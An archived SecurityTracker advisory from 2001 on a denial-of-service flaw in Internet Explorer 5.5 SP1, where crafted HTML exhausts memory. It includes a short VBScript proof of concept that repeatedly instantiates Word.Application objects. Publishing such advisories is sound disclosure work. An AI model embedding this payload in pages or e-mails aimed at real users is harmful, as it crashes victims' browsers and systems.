SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Browser)  >   Microsoft Internet Explorer (IE) Vendors:   Microsoft
Microsoft Internet Explorer Can Consume All Memory Due to Malicious HTML Code
SecurityTracker Alert ID:  1001424
SecurityTracker URL:  http://securitytracker.com/id/1001424
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 24 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): IE 5.5 with SP1
Description:   A vulnerability has been reported in Microsoft's Internet Explorer web browser that allows a remote user to create malicious HTML that can cause another user's browser to consume all memory and potentially crash.

When the appropriate malicious code is presented to the web browser (either via a web page or via HTML-based e-mail), IE will display a security warning asking the user for confirmation. If the user answers "No" to the security query, an instance of the "word.application" object will be created. The code is reportedly not executed, however, memory is allocated for the object.

Some demonstration exploit code follows:

//---------cut here--------------------------
<HTML>
<SCRIPT LANGUAGE="VbScript">
On Error Resume Next
Dim a
Dim i
for i=1 to 100
Set a = CreateObject("Word.Application")
Next
</SCRIPT>
</HTML>
//---------end of cut------------------------

Impact:   A remote user could create a malicious web page or HTML-based e-mail such that, when the victim loads the HTML, the victim's IE browser consumes all available memory, resulting in a potential system crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:   Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC